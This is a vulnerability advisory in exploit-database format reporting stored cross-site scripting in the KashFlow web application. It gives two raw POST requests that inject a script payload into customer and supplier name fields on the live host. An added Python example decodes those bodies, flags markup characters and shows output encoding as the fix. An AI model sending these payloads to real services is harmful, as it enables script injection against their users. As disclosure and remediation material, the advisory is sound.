KashFlow Web Application suffers from a persistent cross-site scripting vulnerability.
# Exploit Title: KashFlow Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://app.kashflow.com
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Area #1
Request
POST /createCustomer.asp HTTP/1.1
Host: app.kashflow.com

custname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custcode=SCRI01&custSource=379349&custCountry=GB&inv=0&do=create
### Vulnerable Area #2
Request
POST /createSupplier.asp HTTP/1.1
Host: app.kashflow.com

supname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&supcode=POST01&do=create
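
For triage and for verifying a fix, the following added example (not part of the original advisory and not KashFlow code) decodes the two request bodies above, reports which fields carry HTML metacharacters, and shows the stored name encoded at output time. `render_name_cell` is a hypothetical stand-in for the page template that displays the name, which the advisory does not show.

```python
import html
import re
from urllib.parse import parse_qsl

# Request bodies copied from the two requests in this advisory.
CUSTOMER_BODY = ("custname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
                 "&custcode=SCRI01&custSource=379349&custCountry=GB&inv=0&do=create")
SUPPLIER_BODY = ("supname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
                 "&supcode=POST01&do=create")

# Characters that let a stored value leave an HTML text or attribute context.
MARKUP = re.compile(r"[<>\"'&]")


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    return dict(parse_qsl(body, keep_blank_values=True))


def fields_with_markup(body):
    """Return the names of fields whose decoded value contains HTML metacharacters."""
    return sorted(k for k, v in decode_form(body).items() if MARKUP.search(v))


def render_name_cell(value):
    """Hypothetical template helper: HTML-encode the stored name when it is output."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


if __name__ == "__main__":
    for body in (CUSTOMER_BODY, SUPPLIER_BODY):
        form = decode_form(body)
        for field in fields_with_markup(body):
            # The encoded cell is displayed as text instead of being parsed as markup.
            print(field, "->", render_name_cell(form[field]))
```

Encoding at output is what closes a stored XSS; flagging metacharacters on input is useful for triage of existing records but is not a substitute for it.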